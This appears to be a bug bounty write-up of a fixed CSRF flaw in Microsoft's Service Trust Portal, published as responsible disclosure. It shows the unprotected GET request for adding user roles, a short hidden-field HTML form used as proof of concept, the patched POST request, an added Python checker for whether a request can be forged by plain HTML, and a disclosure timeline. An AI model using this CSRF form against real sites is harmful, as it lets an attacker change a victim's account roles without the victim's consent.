Microsoft - CSRF Bug - Add Users in their Cloud Service Trust Portal

In this blog post I will show you one of the easy CSRF bugs which I found on the Microsoft platform; not only that, I will reiterate why it is important to keep trying.

If you follow me on Twitter, then you must know that I sometimes (sorry, regularly) tweet NeverGiveUp sort of tweets. The best reason I can give you is the example of my experience with the Microsoft Bug Bounty Program.

Talking about the Microsoft bug bounty, the first point is that they only accept submissions which are high impact. Big `NO` to low-hanging fruit and big `NO` if you cannot exploit the bug. I reported 10+ bug reports to the Microsoft security team; this includes some low-hanging fruit and some bugs which I was not able to exploit. All were marked as NA. Well, it's but obvious after all this failure: when my mind tells me to give up on this, I tell myself.

So after spending hours, days and months, I finally got the HIT called SUCCESS.
(Keep Trying #NeverGiveUp)

Let's move on to the PoC.


I was testing one of Microsoft's domains, the Service Trust Portal (STP).
During the testing, I came across the feature below in their portal, where you can add portal users and portal admins.

The Add User feature caught my attention. Generally speaking, while checking out an application I always try to correlate the application workflow with the different attack vectors I can execute (some tips to try in the wild ...XD), so straight away I thought about CSRF.


HTTP Request:-

GET /onboarding/AddUserRole/1110?role=User HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: [Some_value]
Connection: keep-alive

From the above HTTP request we can conclude that there is no CSRF token present: the role is added by a plain GET request authenticated only by the session cookie.
Using this loophole, I was able to add user roles on behalf of an admin user.


    <form action="">
      <input type="hidden" name="role" value="User" />
      <input type="submit" value="Submit request" />
    </form>

So I was able to add any user to their Cloud Service Trust Portal by using a CSRF attack.

How they fixed it:-

POST /onboarding/AddUserRole HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 29
Cookie: [Some_value]
Connection: keep-alive
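
Why the changed request shape matters, as an added example (not code from the original post or from Microsoft): the check below parses a raw request head and reports whether plain cross-site HTML (a link, image or form) could produce it. The function names and header lists are hypothetical, and the result only holds if the server rejects requests that lack the custom header and JSON content type, which the post does not show.

```python
# Added example: can a request be produced cross-site by plain HTML
# (link, image, form), i.e. without script and a CORS preflight?
FORM_TYPES = {"application/x-www-form-urlencoded", "multipart/form-data", "text/plain"}
# Headers the browser attaches by itself; anything else needs script.
BROWSER_SET = {"host", "user-agent", "accept", "accept-language",
               "accept-encoding", "cookie", "connection", "content-length",
               "content-type", "referer", "origin"}

# Request heads shortened from the two requests shown in the post.
BEFORE = """GET /onboarding/AddUserRole/1110?role=User HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: [Some_value]
Connection: keep-alive"""
AFTER = """POST /onboarding/AddUserRole HTTP/1.1
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Cookie: [Some_value]"""

def parse_request(raw):
    """Split a raw request head into (method, path, lower-cased headers)."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), path, headers

def forgeable_by_html(raw):
    """Return (forgeable, blockers); blockers lists what plain HTML cannot send."""
    method, _path, headers = parse_request(raw)
    blockers = []
    if method not in ("GET", "POST"):
        blockers.append(f"method {method} is not available to links or forms")
    custom = sorted(h for h in headers if h not in BROWSER_SET)
    if custom:
        blockers.append("custom header needs script and preflight: " + ", ".join(custom))
    if method == "POST":
        ctype = headers.get("content-type", "").split(";")[0].strip().lower()
        if ctype not in FORM_TYPES:
            blockers.append(f"content type {ctype} cannot be set by a form")
    return not blockers, blockers

if __name__ == "__main__":
    for label, raw in (("before fix", BEFORE), ("after fix", AFTER)):
        print(label, forgeable_by_html(raw))
```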


They listed me in their Hall of Fame and rewarded me with the bounty.

Moral Of The Story:- 
Stay focused, Don't Quit, keep trying #BelieveThat


Vulnerability timeline:

Feb 14, 2016  : Reported to Microsoft Security Response Center.
Feb 20, 2016  : Received initial reply from Microsoft Team. Report triaged.
Feb 25, 2016  : Microsoft Security Team successfully reproduced the bug.
Mar 16, 2016  : Microsoft Security Team fixed the reported bug.
Apr 01, 2016  : Bounty of $500 awarded by Microsoft.
June 19, 2016 : Public responsible disclosure.
